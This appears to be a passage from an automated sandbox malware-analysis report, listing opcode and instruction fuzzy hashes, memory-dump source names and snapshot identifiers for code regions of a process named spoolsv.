              • Opcode Fuzzy Hash: cf504438ff0977ac2fa646fba062b6695710031e3f729b9feeb2a9022070ec4b
              • Instruction Fuzzy Hash: E621FF3084E2C94FE707AB7488655E97FB0EF57204F0944FBD48ACB4E3DA28655AC311
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a05de50311602c31f62e5093a3b218eaa54c0cdfb98accee5e2ade61cbc10a8f
              • Instruction ID: 0e6c3c74eed8ec7ff683d1e58d4ea94c2f35acce00412c94fd623b1e332020ad
              • Opcode Fuzzy Hash: a05de50311602c31f62e5093a3b218eaa54c0cdfb98accee5e2ade61cbc10a8f
              • Instruction Fuzzy Hash: 1D219A3084E6894FDB46AB6088691B97FB0EF16211F1900FBC409DB0E3DB296949CB51
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df4a9b66ad34f1797897d2bfaffaead482ea74e27bc7b4f3e928188156566bc1
              • Instruction ID: 0ee82e1f6f88077e6db0415792a0786207d5f271604fb2c416cb8481dfbdd6cc
              • Opcode Fuzzy Hash: df4a9b66ad34f1797897d2bfaffaead482ea74e27bc7b4f3e928188156566bc1
              • Instruction Fuzzy Hash: 5E116D3090DA4E9FEB98EF6888592B97BB0FF68742F0405BBD409D61D2DB39A444CB40
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62ef9e0446d4bfe230d09f71fe766813ef1c42ae88c2dbd2d252eb692f8014bd
              • Instruction ID: e086150fd9b5bc2a9c44dc522cd6c811b4f832cb956d4f84ba964b5f9b70c783
              • Opcode Fuzzy Hash: 62ef9e0446d4bfe230d09f71fe766813ef1c42ae88c2dbd2d252eb692f8014bd
              • Instruction Fuzzy Hash: CA11B8309086498FDB88EF68C89A1F93BE0FF68701F01027FE80AD3281CB34A550CB84
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d151d1d0e538519f3fa24d8af8e0fe38c27d468a5845fad2b4d051568d3947ae
              • Instruction ID: 41dedc7c670894cc376fa147be93560af5ac8780629013f7b8c162a961667127
              • Opcode Fuzzy Hash: d151d1d0e538519f3fa24d8af8e0fe38c27d468a5845fad2b4d051568d3947ae
              • Instruction Fuzzy Hash: A1116D3090D64E9FEB99EF28C8592B97BA0FF68342F0405BBD409D6592DB39A584CB41
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a97097e1f4c0a62eb3a1e0b43bb0ac9589532b68aa342228d25eeb4fc6791622
              • Instruction ID: f80c72fb11a3dadcc5d6488de489fcac5fd160f10f87cc9553403be702c5ca11
              • Opcode Fuzzy Hash: a97097e1f4c0a62eb3a1e0b43bb0ac9589532b68aa342228d25eeb4fc6791622
              • Instruction Fuzzy Hash: 1721903080E64A9FEB89EF28C4592BDBBB0FF69345F0401BBD419E61D2DB38A440CB41
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 103320e9a6582050786a2e770c37eb31fe636807535ac9e6c36cd41447702818
              • Instruction ID: b571fdbd0d3ce5fb063d244262d947d4951496b3433e3f7d6dd461cac76f0a02
              • Opcode Fuzzy Hash: 103320e9a6582050786a2e770c37eb31fe636807535ac9e6c36cd41447702818
              • Instruction Fuzzy Hash: BF117F3080E64E9FEB89EF2884592B97BA0FF69345F1405BFD409E71D2DB39A440C741
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 02385afbcbb12accdc8dc4b21fbfcbcb0ee5b14fdaf96eb7080e72552bf9b978
              • Instruction ID: 97a47b4a5c7501274bd341a8887a9f643710e5e71db4610279fd4688317e967f
              • Opcode Fuzzy Hash: 02385afbcbb12accdc8dc4b21fbfcbcb0ee5b14fdaf96eb7080e72552bf9b978
              • Instruction Fuzzy Hash: 4C11B23190EA898FE759EB64889A2B87AA0FF29709F0404BFD009A65D2DB296454C715
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9a174e791341d935e6f67e8776a94254f2ed2db0bd9675bb4365ffbb8ef5eed
              • Instruction ID: a2ccac912411414c0fc23e3fd8ae63fcfefe27d8ae5f84876731102d0f67b3a0
              • Opcode Fuzzy Hash: f9a174e791341d935e6f67e8776a94254f2ed2db0bd9675bb4365ffbb8ef5eed
              • Instruction Fuzzy Hash: 8D116A3080D68E9FEB86FB6898581BA7BB0FF19341F0405BBD809C71E2EB386950C754
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16cfdf1dbc266878b733a0470e274454ffceefd3722c04d6f46639d0e6ac6448
              • Instruction ID: dda48daba704b8552a9c11b1e423be715e298cdfe8dbc9b07e5980ecd3806cbf
              • Opcode Fuzzy Hash: 16cfdf1dbc266878b733a0470e274454ffceefd3722c04d6f46639d0e6ac6448
              • Instruction Fuzzy Hash: B611B271D0DA898FE79AEB6488A92B87BF0FF25300F0404BFC419D65D2DF2A6444CB05
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9c30bc175ea8693d6e7466e74ca70f0e5c3534af35c31f51819fc222ef21eae
              • Instruction ID: b6b5727700376d42714b05c43e9031c71301eb54c8e93e352a6cfb9d55b019a1
              • Opcode Fuzzy Hash: c9c30bc175ea8693d6e7466e74ca70f0e5c3534af35c31f51819fc222ef21eae
              • Instruction Fuzzy Hash: 7311903080E68A8FEB45EF6484592B97BF0FF29355F0404BBC409E71E2DB396984CB51
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 554af6e3f8d0962011575f7fe8d5eed46efa27a43db470b5ea5afd53f045189f
              • Instruction ID: 74954facc6fc0ef610419be3b19e41f7a63481de6dc7b9825bf25fdaddf9feae
              • Opcode Fuzzy Hash: 554af6e3f8d0962011575f7fe8d5eed46efa27a43db470b5ea5afd53f045189f
              • Instruction Fuzzy Hash: 3B117C3080C94E9FEB51FB74C8486B97BF0FF29741F0445B6D809D70A1EB38A5848B54
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56eb1a5080c8500af397ab83e0d21d7ed89709690676d2b343f2584ba646991a
              • Instruction ID: 3f7853b6a3e9304cfd3d670126f1d708e2b398115c9a5077047338d6ae574c04
              • Opcode Fuzzy Hash: 56eb1a5080c8500af397ab83e0d21d7ed89709690676d2b343f2584ba646991a
              • Instruction Fuzzy Hash: 26119A3090DA4A8FEB89EF24C4592B97BB0FF69741F4400BBD40AD21D2EB2AA4548B44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 505375e2a01acb6046c2faac288b574a55de3c32d7a7f7baef0ef8131e6e337e
              • Instruction ID: 7b8e01c71e68700b65b619b05a07f215f41cf83a76d2c0016b4ac68ab769fe49
              • Opcode Fuzzy Hash: 505375e2a01acb6046c2faac288b574a55de3c32d7a7f7baef0ef8131e6e337e
              • Instruction Fuzzy Hash: 3011A13081C54E8FE742FB68844C5F97BE1FF19351F1404B7D408D7092EB34A1848751
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 50f6dba446f802e5d5d0df5d37e96d6dfe0aac6898d5863e17dcaba2361648f1
              • Instruction ID: b042f9c74af3e27f377327a5fc2f12f18cf36424694039b9d19f8e2b154bac37
              • Opcode Fuzzy Hash: 50f6dba446f802e5d5d0df5d37e96d6dfe0aac6898d5863e17dcaba2361648f1
              • Instruction Fuzzy Hash: 73118F3080E64A9FEB45EB6484592B97BF0FF38705F0805BBD409E65D6EB356444C741
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2d9f62649996a455280aee6a5466b14c9df0572240748f9435e0d92bdfc47c1a
              • Instruction ID: f8c75c6b68c10cbd9abf6dc1df5483d5fd4916286a136421455c9a426e0932ea
              • Opcode Fuzzy Hash: 2d9f62649996a455280aee6a5466b14c9df0572240748f9435e0d92bdfc47c1a
              • Instruction Fuzzy Hash: EA11397090868E8FDB89EF68C8596BA7BA0FF18301F0409BAD41AC61D2DB35A540C704
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f8f8bdd0e11dc3efffc85a909fbf04a214ba2f97b835c6211ecc41eac223203
              • Instruction ID: 189dc0eafbea90077d6c6a154d76d14873786151469954104ef8c92164a59df5
              • Opcode Fuzzy Hash: 6f8f8bdd0e11dc3efffc85a909fbf04a214ba2f97b835c6211ecc41eac223203
              • Instruction Fuzzy Hash: 0B113970918A4E8FEB95FF6888692BABBE0FF18341F0404BBD80AC6191EB35A550C704
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df2f11d5ee56b2bea31488fb90cf5ec472e973913deef8b287187a63a5b78b59
              • Instruction ID: 4652713776d4c82b06a59b51833370b44cac65cbfd974068d0b9293bd2433f56
              • Opcode Fuzzy Hash: df2f11d5ee56b2bea31488fb90cf5ec472e973913deef8b287187a63a5b78b59
              • Instruction Fuzzy Hash: 13119E31D0D68A9FE742FB2488592A9BBE0FF29351F0405B7C408D70D6EB38A5448746
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e3bbcb43ff426051269d2024ebd6eb8ac9a12536bfcd0fbb6c55dd99cb4d0994
              • Instruction ID: 5f92669d0859927b72cb174cc67a9993c65e770c8b783260aea78e1b33e9bd3a
              • Opcode Fuzzy Hash: e3bbcb43ff426051269d2024ebd6eb8ac9a12536bfcd0fbb6c55dd99cb4d0994
              • Instruction Fuzzy Hash: 5411A33090EA4E8FEB45EB2484596B97BE1FF28345F4404BBD419E31D2DF39A580C701
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 363b79bd6b97d452ee2af7df337a6ab2f85bda0d6df69de3ced00e54a82ce468
              • Instruction ID: 46729d5223554c0bd981ae4357964a1022507cc6b933d757906cfc9921d209fc
              • Opcode Fuzzy Hash: 363b79bd6b97d452ee2af7df337a6ab2f85bda0d6df69de3ced00e54a82ce468
              • Instruction Fuzzy Hash: 86017831D0D68E9FE751FB68884A6A97BE0EF59342F0508B7D80CC61E2EB38E4848704
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c4882ec0525b3e7df54d59ddf4cadaeab5a3c5128969bfb7ac6c370e9139012
              • Instruction ID: aa2eab45af054f73055000d7dc97be5733e3fb122e6714e01d018da07946b569
              • Opcode Fuzzy Hash: 7c4882ec0525b3e7df54d59ddf4cadaeab5a3c5128969bfb7ac6c370e9139012
              • Instruction Fuzzy Hash: C0019E3090890E8FEB48EF64C4596BAB7A1FF58386F50447EE40EC22C0CB31A590CB44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 804f6484fc710651ee6143f8b1ad440defe4d8b83e7d25ad13cf897444fccde5
              • Instruction ID: 84067421ad50b82ee785928e3d05bf33be7279ea89d9d11d6c9913380d91b0bb
              • Opcode Fuzzy Hash: 804f6484fc710651ee6143f8b1ad440defe4d8b83e7d25ad13cf897444fccde5
              • Instruction Fuzzy Hash: 2B01297092894E9EEB98FF6884692B97AA0FF18341F10047BD41EC6191DB31A550CB04
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80642d5b8a7f6da08b2129f1f5c4f9a1d0b4d1d2f474acec8df624e8583323b2
              • Instruction ID: 3f2c70a4be22a3598cc26007cbcf1e8062391e25a3624d3c685774184a5482be
              • Opcode Fuzzy Hash: 80642d5b8a7f6da08b2129f1f5c4f9a1d0b4d1d2f474acec8df624e8583323b2
              • Instruction Fuzzy Hash: DA01F13084DA8D8FDB49EF24C4581BA7BA0FF28744F0404BBD40AD70E2EB75A940CB40
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b741be51f62fef20ea411baf8fe892ff7a78046617cde3829d9a27a926b3cf35
              • Instruction ID: 1c4ccfaa58656c3748b478608dcde3c08716ff8e4a1c22d7bf0b30d9f64bd852
              • Opcode Fuzzy Hash: b741be51f62fef20ea411baf8fe892ff7a78046617cde3829d9a27a926b3cf35
              • Instruction Fuzzy Hash: 4C018B3085D64E9FE795FB6884886B97BE0FF59342F5504B7D408C70A2EB38E0408704
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b3e4011a2c9ed59f4e767c9ebd7e2ea3549d74d113b0be701dc59d3a843eba1
              • Instruction ID: 3c21777da8250d192541bf02eee59d15384c0ce76a006db326ce194f6038a38e
              • Opcode Fuzzy Hash: 9b3e4011a2c9ed59f4e767c9ebd7e2ea3549d74d113b0be701dc59d3a843eba1
              • Instruction Fuzzy Hash: A701923084D68D4FDB55AB2484692BDBBA0FF25345F0504FFD409D60E2DB75A554C741
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b28fab4a3a26aeeeda26ba0245e8d9602455b22ac0e6efa955d43f12d73fd3cb
              • Instruction ID: 0aab06960ecf77e6019811eed53df505c651e1856fc102b1245d61f21c80c88a
              • Opcode Fuzzy Hash: b28fab4a3a26aeeeda26ba0245e8d9602455b22ac0e6efa955d43f12d73fd3cb
              • Instruction Fuzzy Hash: 8E018F31D1D6898FE742BB7488592A97FE0EF5A342F0604F7D808CB0E6EB38A4448711
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2be92025cf559d6ba05db21ed8d797af9515d38facbd8ce2b3c659732dd1df58
              • Instruction ID: b26f4972f6942ee2a6af875d3662e68ba2f4085751465fb6d7443023e45f32cb
              • Opcode Fuzzy Hash: 2be92025cf559d6ba05db21ed8d797af9515d38facbd8ce2b3c659732dd1df58
              • Instruction Fuzzy Hash: BA01713090EA8D9FE752BB7484595B97FE0EF6A340F1504F7D408C70B2EB38A5548711
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 112694ded4aff2da4883e0c651655607011233365ca729bf8654e3e4361bd3bf
              • Instruction ID: 419f613e7f5aba6a48c65c03bdf4d5574ab07fbacb87bfde52504e2d986f0ef8
              • Opcode Fuzzy Hash: 112694ded4aff2da4883e0c651655607011233365ca729bf8654e3e4361bd3bf
              • Instruction Fuzzy Hash: 4F01783084EB895FE752BB2498591A97BE0EF5A340F1608B7D408CB0A2EB28A484C701
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8ec885cbed01331ad43d9e01fc2aeb00af2f2b8f97328c1c9a5a0b0e07f25514
              • Instruction ID: 62f1e554b909a9cda948264f822e6a866c4baf550f1094d114af8428cc7baa95
              • Opcode Fuzzy Hash: 8ec885cbed01331ad43d9e01fc2aeb00af2f2b8f97328c1c9a5a0b0e07f25514
              • Instruction Fuzzy Hash: 2101FF3080D68E8FEB99EF2488592FA7BA0FF55341F4000BEE808C22C2DB35D490C744
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 19a461c14cebaff5d3232232b8cdcb15d8d7245381779a7653970bb1b0591a62
              • Instruction ID: e99e20a613dc8426e70129a5c3a52498749959ddaa4778b58202b305723cb82c
              • Opcode Fuzzy Hash: 19a461c14cebaff5d3232232b8cdcb15d8d7245381779a7653970bb1b0591a62
              • Instruction Fuzzy Hash: EA01693091860E9EEB59FFA884586BE76A1FF18346F50087EE40EC61D1EF35A190C604
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1db56f3b835dfe49ad004c91ae9d5e1c76fa6e19d62e05b2115ed274a555019
              • Instruction ID: d03e00fe451eb5642abc3ce5f6623f7478fac096096f1766979655766ccf2dd0
              • Opcode Fuzzy Hash: e1db56f3b835dfe49ad004c91ae9d5e1c76fa6e19d62e05b2115ed274a555019
              • Instruction Fuzzy Hash: 35016930919A0E9EEB59FB6484592B9B6E0FF18346F20487FE40EC21D1DF39A550C614
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
              • Instruction ID: 6c1773de4df031a049bb746555071ee6d070705278b5cc1f806c81fc3f4089e0
              • Opcode Fuzzy Hash: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
              • Instruction Fuzzy Hash: E5F06D3081E64E8FEB95EF6494152FA77A4FF15389F50457AF80DC22C1DB39A5A0CB88
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
              • Instruction ID: 27cdfefb2d28d74907dbc0ab21325ccc7f9008d7d64202602453ef763a79e55b
              • Opcode Fuzzy Hash: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
              • Instruction Fuzzy Hash: 8FF0623180E78A8FEB5AAF6488591A93BA1FF16341F4504BBD449C61D2EB38A454C741
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a5a3465bba0c7e39527f6fced4cb0f9de0bfe6fd11ff8cdc08fbf25c7bca0afb
              • Instruction ID: b07d3b661bb284db920168cc5d0a97a0bbcb0e44b1264f88559fd63986b49132
              • Opcode Fuzzy Hash: a5a3465bba0c7e39527f6fced4cb0f9de0bfe6fd11ff8cdc08fbf25c7bca0afb
              • Instruction Fuzzy Hash: BAF0E770D199198FEB90EB28C446BE9B3B1FF58380F1082A6C40DD3196CB34AAC18F44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
              • Instruction ID: c329ae4e80c3759325399ba9f5f38cf91314f3fd784a932d0f242b3d9667f407
              • Opcode Fuzzy Hash: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
              • Instruction Fuzzy Hash: DBF0BE7080E78E8FEB59AF6488292BD7BA0FF15306F4544BFE809C60D2EB39A454C741
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67a0c87765cda1a6993e2fe57a4d8743617b7252e48901c217407dd211bd8697
              • Instruction ID: 0a13003e177fd3022cdc3e56d69e851994582da8d6e5fba068169434ac73e99a
              • Opcode Fuzzy Hash: 67a0c87765cda1a6993e2fe57a4d8743617b7252e48901c217407dd211bd8697
              • Instruction Fuzzy Hash: 80F03A3090E51A8FEB50FB14C894BEEB7B1EB94351F105276D40DE32D5DF3869848B98
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37efdfc19629e391198d7d1322049dd488c8871099144e6f4d712aa68319741b
              • Instruction ID: 4642d596df29f829413cd667ee6b44414d5db07309888377e6bf3d4ddd181390
              • Opcode Fuzzy Hash: 37efdfc19629e391198d7d1322049dd488c8871099144e6f4d712aa68319741b
              • Instruction Fuzzy Hash: 40E0EC70C0C22D8FEB559F50C8543ED76B1EF10740F00523AD009AB1C0DBB81984CF48
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9db71e81f5869626451fae5988b1e68b5d80d8d67456325b5f1ff72a3660e349
              • Instruction ID: b6af72e65e79655acffbf1a0cc325f8058ae93e325bcedb6e95ccd0a79ae3f95
              • Opcode Fuzzy Hash: 9db71e81f5869626451fae5988b1e68b5d80d8d67456325b5f1ff72a3660e349
              • Instruction Fuzzy Hash: E3D0C77490D1554FD7459F208C586ED7A61EF51340F0411BED04D5B1D2DB741554CF55
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: 6$V$]$^
              • API String ID: 0-1270753922
              • Opcode ID: 2b10022d8cbe09c05b806504e4dbe33603f497203cdad67dbdc7ffe766c44c20
              • Instruction ID: 07b80ddd3110100a45e91062fe83c3044c445b20e07afe3c0b4f35994d051383
